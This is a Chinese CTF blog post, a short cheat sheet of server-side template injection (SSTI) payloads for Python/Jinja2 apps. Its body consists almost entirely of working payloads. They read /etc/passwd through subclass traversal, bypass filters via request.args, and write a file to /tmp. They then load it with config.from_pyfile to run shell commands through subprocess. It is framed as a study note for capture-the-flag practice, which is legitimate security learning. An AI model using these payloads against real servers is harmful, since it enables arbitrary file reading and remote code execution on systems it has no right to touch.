<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>SSTI的一些基本操作 | Vergissmeinnicht</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="CTF,Web,SSTI">
    <meta name="description" content="简介记录一下SSTI的一些基本操作，方便以后使用。主要内容转载自该博客">
<meta name="keywords" content="CTF,Web,SSTI">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI的一些基本操作">
<meta property="og:url" content="http://yoursite.com/2019/01/17/SSTI的一些基本操作/index.html">
<meta property="og:site_name" content="Vergissmeinnicht">
<meta property="og:description" content="简介记录一下SSTI的一些基本操作，方便以后使用。主要内容转载自该博客">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-01-27T03:05:13.560Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SSTI的一些基本操作">
<meta name="twitter:description" content="简介记录一下SSTI的一些基本操作，方便以后使用。主要内容转载自该博客">
    
        <link rel="alternate" type="application/atom+xml" title="Vergissmeinnicht" href="/atom.xml">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

</head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide">
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.png">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">Ver</h5>
          <a href="mailto:verhan@163.com" title="verhan@163.com" class="mail">verhan@163.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/">
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives">
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags">
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories">
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/about">
                <i class="icon icon-lg icon-address-card"></i>
                About
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">SSTI的一些基本操作</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">SSTI的一些基本操作</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-01-17T05:48:52.000Z" itemprop="datePublished" class="page-time">
  2019-01-17
</time>


	<ul class="article-category-list"><li class="article-category-list-item"><a class="article-category-list-link" href="/categories/Web/">Web</a></li></ul>

            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#简介"><span class="post-toc-number">1.</span> <span class="post-toc-text">简介</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#任意文件读取POC"><span class="post-toc-number">2.</span> <span class="post-toc-text">任意文件读取POC</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#第一种代码执行POC"><span class="post-toc-number">3.</span> <span class="post-toc-text">第一种代码执行POC</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#第二种代码执行POC：充分地利用from-pyfile方法。"><span class="post-toc-number">4.</span> <span class="post-toc-text">第二种代码执行POC：充分地利用from_pyfile方法。</span></a></li></ol>
        </nav>
    </aside>


<article id="post-SSTI的一些基本操作" class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">SSTI的一些基本操作</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-01-17 13:48:52" datetime="2019-01-17T05:48:52.000Z" itemprop="datePublished">2019-01-17</time>

            
	<ul class="article-category-list"><li class="article-category-list-item"><a class="article-category-list-link" href="/categories/Web/">Web</a></li></ul>



            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style="display:none">
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>记录一下SSTI的一些基本操作，方便以后使用。主要内容转载自<a href="http://www.cnblogs.com/tyomcat/p/5440488.html" target="_blank" rel="noopener">该博客</a><br><a id="more"></a></p>
<hr>
<h1 id="任意文件读取POC"><a href="#任意文件读取POC" class="headerlink" title="任意文件读取POC"></a>任意文件读取POC</h1><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file类能够实例化文件对象，而且如果我们实例化了一个文件对象，那么我们就可用使用类似于read的方法来读取相关内容。</span><br><span class="line">找到file类的索引，在我的环境中&lt;type <span class="string">'file'</span>&gt;类的索引是<span class="number">40</span>，我们就注入&#123;&#123; <span class="string">''</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'/etc/passwd'</span>).read() &#125;&#125;</span><br><span class="line">可以通过以下语句绕过一些过滤&#123;&#123;''[request.args.a][request.args.b][2][request.args.c]()[40]('/etc/passwd')[request.args.d]()&#125;&#125;?a=__class__&amp;b=__mro__&amp;c=__subclasses__&amp;d=read</span><br></pre></td></tr></table></figure>
<hr>
<h1 id="第一种代码执行POC"><a href="#第一种代码执行POC" class="headerlink" title="第一种代码执行POC"></a>第一种代码执行POC</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">file类不仅去读文件，而且也可以向目标服务器的可写入路径中写文件，</span><br><span class="line">然后我们再通过SSTI漏洞第二种代码执行poc调用from_pyfile方法去compile文件并执行其中的内容。这就是一个二次进攻。</span><br><span class="line">将&#123;&#123; <span class="string">''</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'/tmp/owned.cfg'</span>, <span class="string">'w'</span>).write(<span class="string">'&lt;malicious code here&gt;'</span>) &#125;&#125;注入到SSTI漏洞点，</span><br><span class="line">然后在通过注入&#123;&#123; config.from_pyfile(<span class="string">'/tmp/owned.cfg'</span>) &#125;&#125;调用编译过程。该代码在编译时将会被执行。这就实现了远程代码执行。</span><br></pre></td></tr></table></figure>
<hr>
<h1 id="第二种代码执行POC：充分地利用from-pyfile方法。"><a href="#第二种代码执行POC：充分地利用from-pyfile方法。" class="headerlink" title="第二种代码执行POC：充分地利用from_pyfile方法。"></a>第二种代码执行POC：充分地利用from_pyfile方法。</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">将&#123;&#123; <span class="string">''</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'/tmp/owned.cfg'</span>, <span class="string">'w'</span>).write(<span class="string">'from subprocess import check_output\n\nRUNCMD = check_output\n'</span>) &#125;&#125;注入到SSTI漏洞点，</span><br><span class="line">注入&#123;&#123; config.from_pyfile(<span class="string">'/tmp/owned.cfg'</span>) &#125;&#125;来将新的项目添加到config对象中，</span><br><span class="line">将&#123;&#123; config[<span class="string">'RUNCMD'</span>](<span class="string">'/usr/bin/id'</span>,shell=<span class="keyword">True</span>) &#125;&#125;注入到SSTI漏洞点。</span><br></pre></td></tr></table></figure>
        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2019-01-27T03:05:13.560Z" itemprop="dateUpdated">2019-01-27 11:05:13</time>
</span><br>


        
        华南理工大学软件工程大四学生\n Kap0k/De1ta成员，主要负责Crypto/BlockChain\n 目前正在学习Pwn，希望有朝一日在线下打Q4n\n 保研至北邮天枢实验室，未来的工作是给大佬端茶送水
        
    </div>
    
    <footer>
        <a href="http://yoursite.com">
            <img src="/img/avatar.png" alt="Ver">
            Ver
        </a>
    </footer>
</blockquote>

        


        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/SSTI/">SSTI</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web/">Web</a></li></ul>


            


        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/01/19/RCTF-2015-Decode-The-File/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">RCTF-2015 Decode The File</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2019/01/16/2017-NJCTF-Guess/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">2017 NJCTF-Guess</h4>
      </a>
    </div>
  
</nav>



    




















</article>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style="display:none">
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style="display:none">
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
                <span><a href="/atom.xml" target="_blank" class="rss" title="rss"><i class="icon icon-lg icon-rss"></i></a></span>
            
            <span>This blog is licensed under a <a rel="license" href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>Ver &copy; 2015 - 2020</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>


    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: false, REWARD: false };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
